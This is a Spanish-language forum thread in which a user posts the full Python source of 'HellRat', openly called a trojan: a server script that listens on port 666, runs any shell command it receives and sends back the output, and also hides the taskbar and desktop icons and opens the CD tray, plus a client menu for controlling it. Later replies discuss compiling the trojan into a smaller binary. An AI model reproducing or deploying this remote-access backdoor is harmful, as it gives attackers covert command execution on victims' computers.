[Python] HellRat By Doddy H

Iniciado por BigBear, Julio 03, 2011, 09:35:15 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 03, 2011, 09:35:15 PM Ultima modificación: Enero 25, 2013, 07:28:51 PM por 11Sep
Hola , aca traigo un troyano en python con las siguientes
opciones

  • Ocultar inicio
  • Mostrar inicio
  • Ocultar barra de tereas
  • Mostrar barra de tareas
  • Abrir CD
  • Cerrar CD
  • Ejecutar comandos
  • Mostrar informacion

    server.py

    Código: python

    #!usr/bin/python
    #Hell RAt (C) Doddy Hackman 2011

    import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess

    print "\n\n[+] Online\n\n"

    slave = socket.socket()
    slave.bind(("",666))
    slave.listen(999)

    a,b = slave.accept()

    while True:
     rex = a.recv(20)
     if re.findall("getso",rex):
      z = os.name
      a.send(z)
     if re.findall("getpath",rex):
      h = os.getcwd()
      a.send(h)
     if re.findall("ocultarinicio",rex): 
      x = win32gui.FindWindow("Shell_TrayWnd","")
      win32gui.ShowWindow(x,win32con.SW_HIDE)
     elif re.findall("mostrarinicio",rex):
      x = win32gui.FindWindow("Shell_TrayWnd","")
      win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
     elif re.findall("ocultaricono",rex):
      x = win32gui.FindWindow(0,"Program Manager")
      win32gui.ShowWindow(x,win32con.SW_HIDE)
     elif re.findall("mostraricono",rex):
      x = win32gui.FindWindow(0,"Program Manager")
      win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
     elif re.findall("abrircd",rex):
      ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
     elif re.findall("cerrarcd",rex):
      ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
     else: 
      rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
      if re:
       a.send(rea.stdout.read())
      else:
       a.send(rea.stderr.read())
     

    # The End   


    cliente.py

    Código: python

    #!usr/bin/python 
    #HellRat (C) Doddy Hackman 2011

    import os,socket,sys

    def head(): 
     print "\n\n-- == hELLrAT == --\n\n"

    def copyright():
     print "\n\n(C) Doddy Hackman 2011\n\n"

    def clean():
     if sys.platform=="win32":
      os.system("cls")
     else:
      os.system("clear")

    def men():

     try:
      ip = raw_input("[+] IP : ")	
      client = socket.socket()		
      client.connect((ip,666))
      while True: 
       clean()
       print "\n\n[+] Welcome to ",ip,"\n\n"
       print "\n\n[1] Informacion"
       print "[2] CMD"
       print "[3] Abrir CD"
       print "[4] Cerrar CD"
       print "[5] Ocultar iconos"
       print "[6] Mostrar iconos"
       print "[7] Ocultar barra de tareas"
       print "[8] Mostrar barra de tareas"
       print "[9] Cambiar IP"
       print "[10] Salir"
       op = input("\n\n[Opcion] : ")
       if op == 1:
        print "\n\n[+] Informacion\n\n"
        client.send("getso")
        so = client.recv(999)
        client.send("getpath")
        path = client.recv(999)
        print "[+] SO : "+so  
        print "[+] Path : "+path
        raw_input()
       if op == 2: 
        cmd = raw_input("\n[CMD] : ")
        client.send(cmd)
        code = client.recv(999)
        print code
        raw_input()
       if op == 3:
        client.send("abrircd")
       if op == 4:
        client.send("cerrarcd") 
       if op == 5:
        client.send("ocultaricono")
       if op == 6:
        client.send("mostraricono")
       if op == 7:
        client.send("ocultarinicio")
       if op == 8:
        client.send("mostrarinicio")
       if op == 9:
        men()
       if op == 10:
        client.close()
        copyright()
        raw_input()
        sys.exit(1)
     except:
      print "\n\n[-] Error\n\n"
    head()
    men() 

    # The End

Junio 01, 2013, 09:54:30 PM #1
Hola, estaba leyendo en el foro que alguien mencionó: "lo malo de python es que para un troyano o cualquier otra cosa debes tener el interprete, ya que si lo compilas, el binario tiende a pesar demasiado"

lo cual me hizo preguntarme:

1.- habrá algún tipo de optimización?
2.- probablemente se pueda hacer algo con el .py y cygwin?

creo que la interrogante 1 se responde aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login donde en realidad esta aplicado a la parte gráfica pero es un inicio, la interrogante 2 aún no la indago

espero este link te ayude a poder compilar tu troyano y reducir el tamaño :)
Junio 01, 2013, 10:58:07 PM #2
Gracias por el aporte, muy bueno!!!  :D

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Junio 02, 2013, 12:18:41 AM #3
:) si pueden copiarlo (algun admin) a un sitio que ayude a mas :) seria bueno
Imprimir
Ir Arriba Páginas1
Acciones del Usuario